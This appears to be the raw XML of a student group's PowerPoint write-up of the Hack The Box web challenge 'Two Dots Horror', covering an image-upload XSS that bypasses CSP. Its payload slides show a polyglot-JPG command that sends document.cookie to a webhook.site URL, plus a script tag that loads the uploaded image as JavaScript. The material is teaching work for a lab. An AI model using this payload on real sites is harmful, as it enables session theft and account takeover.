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sldIdLst>
    <p:sldId id="530" r:id="rId5"/>
    <p:sldId id="531" r:id="rId6"/>
    <p:sldId id="533" r:id="rId7"/>
    <p:sldId id="547" r:id="rId8"/>
    <p:sldId id="548" r:id="rId9"/>
    <p:sldId id="549" r:id="rId10"/>
    <p:sldId id="534" r:id="rId11"/>
    <p:sldId id="552" r:id="rId12"/>
    <p:sldId id="551" r:id="rId13"/>
    <p:sldId id="536" r:id="rId14"/>
    <p:sldId id="556" r:id="rId15"/>
    <p:sldId id="554" r:id="rId16"/>
    <p:sldId id="555" r:id="rId17"/>
    <p:sldId id="543" r:id="rId18"/>
    <p:sldId id="54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422"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95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1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7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8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Dots Horror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021016"/>
            <a:ext cx="7068312" cy="2344616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Group 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Leela Krishna Reddy G</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Naga Teja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ravilla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Aparna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Chalumuri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Jaswanth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Srivatsav 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Target identification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491D-AF3A-C879-49E6-F11A17AC3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Two Dots Horror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42CCBA0-6FB1-04D3-7E62-26B297666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686" y="2212975"/>
            <a:ext cx="7550491" cy="3548063"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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EDA4-9335-8AB1-F17C-3E1DD48B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17" y="503339"/>
            <a:ext cx="8657439" cy="956345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Library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CC4A7-C9A3-6842-8A11-522F1F89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192" y="1526210"/>
            <a:ext cx="3018023" cy="956931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder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64A1014-879C-7BBD-58B9-E41512D31C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9706" y="2268069"/>
            <a:ext cx="4396994" cy="338076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865D5-8101-DDF6-1F3D-586622D37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472" y="1526211"/>
            <a:ext cx="2869034" cy="881430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image-size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C334BE-466D-A91D-5B2E-6DBE629F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Two Dots Horror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3287BF-A8C2-EDEE-13F8-2D88EF82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2F2F6BD-1556-34EA-39F0-C480FADE5C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6345302" y="2308942"/>
            <a:ext cx="4396993" cy="338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7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4AC9-0A74-2DE8-57CF-237464FA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composition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2A2796-4BF6-0983-687E-19B8A4F29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4748" y="2270580"/>
            <a:ext cx="4418524" cy="493776"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Imgjs_polygloter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command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00CA219-02CB-B421-D82F-888532770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056964"/>
            <a:ext cx="3119718" cy="3133523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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>python3 img_polygloter.py jpg --height 120 --width 120 --payload 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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>&lt;This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>Webhook.site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>cookie='+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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>" --output stealsession.jpg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A3B9-7BB6-DAC4-975A-F5876104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Two Dots Horror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E97C0-28A8-BCD0-7152-7440E897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3E0A72-61D9-BD7B-7F22-77F1EEEB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869" y="2185416"/>
            <a:ext cx="4646226" cy="32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9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6887-816F-9D66-44CA-B1B37BC8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solution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8C5CFC2-D47D-67B0-EC2E-EBB50352C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106" y="2185416"/>
            <a:ext cx="9689054" cy="27432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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>&lt;script charset="ISO-8859-1"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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>="/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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>/avatar/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Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>test?t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Liberation Mono"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>=1234"&gt;&lt;/script&gt;..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Liberation Mono"/>
              <a:cs typeface="Liberation Mono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197D-0719-0625-0A19-70F9BE62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Two dots Horror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F40AD-79E1-D386-4E7E-6D25E707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2" name="Image9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91316180-0A7E-8CBE-2617-4E3973B170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8375"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1632204" y="2719811"/>
            <a:ext cx="4157850" cy="3315229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Content Placeholder 29" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A37914-8C82-0E20-BF63-0723AA49F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97755" y="2752344"/>
            <a:ext cx="4157850" cy="3315229"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21039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ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.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ea typeface="+mn-lt"/>
              <a:cs typeface="Segoe UI Light" panose="020B0502040204020203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Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>By doing this, the flag has been successfully captured. Through this problem, we learned that CSP bypass is possible through image file uploads and that XSS vulnerabilities can occur.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722376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981200"/>
            <a:ext cx="6422136" cy="3953933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Problem Summary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Website Analysis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Analysis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 Identification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Solution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Two Dots Horror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Two Dots Horror is a medium level challenge, and we are going to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> top 10 strategies and other tools to solve this challenge from Hack the Box.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62F6AC-8E3C-6661-D4E7-D59FEF150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A4775-96DF-7DEC-76F2-59FE16F19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Two Dots Horror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794CAE-EE8E-1B28-EB37-2B5D2C57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0C78CB-4E71-E3B6-4367-21DAA400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OWASP Top 10 Methodologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static &amp; Dynamic Source Code Analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp suite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webhook.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2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05644-CB44-4E74-2842-B71792E40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16E98-A786-5BF7-E753-F03327B89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Two Dots Horror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55916-35BD-BDDA-50F3-CFE94818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792" y="32004"/>
            <a:ext cx="8878824" cy="1069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19F88-1C9C-501C-32E0-D773F0674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792" y="1310172"/>
            <a:ext cx="10208133" cy="4880316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An often-updated report that lists security issues related to web application security is called the OWASP Top 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is an important tool for enhancing online application security and create awareness of typical dangers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webhooks are one of the limited means of communication available to web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically, a POST Request is used for this kind of HTTP protocol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748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B7421-4971-BC14-3ED3-C98CFDB11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8E174-FA4B-5C2B-DB11-7EE145852E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Two Dots Horror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9893D2-ADA4-1365-B277-679B05EE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16EC8-2E5B-032B-7918-61F1376B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10011039" cy="3282696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static Code Analysis is a form of White-Box Testing that helps to identify Security Issues in the source code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Code Analysis is a form of Black-Box Vulnerability scanning which helps to identify flaws in running applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp suite is used to evaluate web apps for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79482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9668"/>
            <a:ext cx="9144000" cy="1786466"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem Summary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C534F8-D4BB-76C8-69DC-6EF546C5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15" y="3870493"/>
            <a:ext cx="10855569" cy="1588711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Admin’s Session is being Hijacked using an image-based blind XSS file upload attack. This Technique is used to take advantage of a weakness in a web application that allows image or document file uploads. The File contains a malicious JavaScript code which causes an XSS Vulnerability.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884-776E-58B4-C3FD-96B28A29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ANALYSIS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7512726-6D3C-2145-8231-733919F931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392" y="2646747"/>
            <a:ext cx="4340932" cy="3069589"/>
          </a:xfr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5DE93E3-73D9-21B3-CFA5-A56DB90470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-424" t="19622" r="501" b="-919"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129634" y="3036815"/>
            <a:ext cx="5530599" cy="2528958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96F4E2-6F5A-529C-2BCC-A14E7531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5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33DD-388E-888B-03D9-D55DC624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07976F-B482-1164-7A7D-C0B06D84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DA453AC-828A-15A6-412E-D55E90480B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2709719" y="1892808"/>
            <a:ext cx="7543006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E87BC9E6-0203-B4EF-B7E8-B7D1FB8543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406</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>68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Liberation Mono</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Two Dots Horror</vt:lpstr>
      <vt:lpstr>CONTENTS</vt:lpstr>
      <vt:lpstr>INTRODUCTION</vt:lpstr>
      <vt:lpstr>Tools &amp; Techniques</vt:lpstr>
      <vt:lpstr>INTRODUCTION</vt:lpstr>
      <vt:lpstr>INTRODUCTION</vt:lpstr>
      <vt:lpstr>Problem Summary</vt:lpstr>
      <vt:lpstr>Website ANALYSIS</vt:lpstr>
      <vt:lpstr>Problem ANALYSIS</vt:lpstr>
      <vt:lpstr>Target identification</vt:lpstr>
      <vt:lpstr>Library analysis</vt:lpstr>
      <vt:lpstr>Payload composition</vt:lpstr>
      <vt:lpstr>Problem solution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2024-04-20T03:18:33Z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